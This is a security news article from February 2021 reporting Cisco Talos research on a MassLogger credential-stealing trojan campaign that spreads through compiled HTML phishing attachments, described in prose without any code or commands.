Security News > 2021 > February > Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials
A credential stealer infamous for targeting Windows systems has resurfaced in a new phishing campaign that aims to steal credentials from Microsoft Outlook, Google Chrome, and instant messenger apps.
Primarily directed against users in Turkey, Latvia, and Italy starting mid-January, the attacks involve the use of MassLogger - a.NET-based malware with capabilities to hinder static analysis - building on similar campaigns undertaken by the same actor against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020.
MassLogger was first spotted in the wild last April, but the presence of a new variant implies malware authors are constantly retooling their arsenal to evade detection and monetize them.
"Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain," researchers with Cisco Talos said on Wednesday.
These attachments contain a single compiled HTML file that, when opened, displays the message "Customer service," but in fact comes embedded with obfuscated JavaScript code to create an HTML page, which in turn contains a PowerShell downloader to connect to a legitimate server and fetch the loader ultimately responsible for launching the MassLogger payload. Aside from exfiltrating the amassed data via SMTP, FTP or HTTP, the latest version of MassLogger features functionality to pilfer credentials from Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave.
"Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality," the researchers noted, adding the threat actor installed a version of Masslogger control panel on the exfiltration server.